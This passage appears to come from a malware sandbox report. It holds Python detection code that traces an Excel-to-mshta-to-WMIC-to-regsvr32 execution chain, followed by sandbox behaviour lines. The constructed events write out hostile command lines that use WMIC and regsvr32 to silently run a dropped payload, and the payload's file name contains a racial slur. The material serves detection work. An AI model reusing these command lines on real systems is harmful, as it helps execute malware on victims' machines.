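        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain[::-1]


def link_wmi_children(events: list) -> dict:
    """Map each WMIC create event to pids whose command line equals the requested child.
    Win32_Process.Create children hang off WmiPrvSE.exe, not the caller, so ppid-based
    ancestry alone never joins mshta/WMIC to the regsvr32.exe they launched."""
    links = {}
    for ev in events:
        if rule_wmic_process_create(ev):
            toks = split_args(ev["cmdline"])
            wanted = split_args(" ".join(toks[[t.lower() for t in toks].index("create") + 1:]))
            for cand in events:
                if cand["pid"] != ev["pid"] and split_args(cand["cmdline"]) == wanted:
                    links.setdefault(ev["pid"], []).append(cand["pid"])
    return links


def event(pid: int, ppid: int, image: str, cmdline: str) -> dict:
    return {"pid": pid, "ppid": ppid, "image": image, "cmdline": cmdline}


# Constructed events modelled on the chain in this report; not a capture from the sandbox.
EVENTS = [
    event(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    event(2000, 100, r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE", "EXCEL.EXE Results12232021.xls"),
    event(2100, 2000, r"C:\Windows\System32\mshta.exe", "mshta.exe"),      # HTA argument not in report
    event(2200, 2100, r"C:\Windows\System32\wbem\WMIC.exe",
          r'wmic process call create "regsvr32.exe -s C:\\ProgramData\fvfnigger.bin"'),
    event(900, 1, r"C:\Windows\System32\wbem\WmiPrvSE.exe", "WmiPrvSE.exe"),  # assumed WMI host
    event(2300, 900, r"C:\Windows\System32\regsvr32.exe", r"regsvr32.exe -s C:\\ProgramData\fvfnigger.bin"),
    event(2400, 2300, r"C:\Windows\SysWOW64\regsvr32.exe", r"-s C:\\ProgramData\fvfnigger.bin"),
    event(3000, 100, r"C:\Windows\System32\regsvr32.exe", r"regsvr32.exe /s C:\Windows\System32\msxml3.dll"),  # benign
]
```

evaluate(EVENTS) raises the three alerts in the order the chain executes; ancestry(EVENTS, 2400) stops at WmiPrvSE.exe, which is the gap link_wmi_children() closes by matching the child command line WMIC was asked to start against later process-creation events. The benign regsvr32.exe /s ...\msxml3.dll event is there to show the DLL-extension check does not fire on ordinary COM registration.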

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation Jump to behavior
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA, 11_2_72A66D0C
Source: C:\Windows\System32\wbem\WMIC.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 11_2_72A66D0C GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA, 11_2_72A66D0C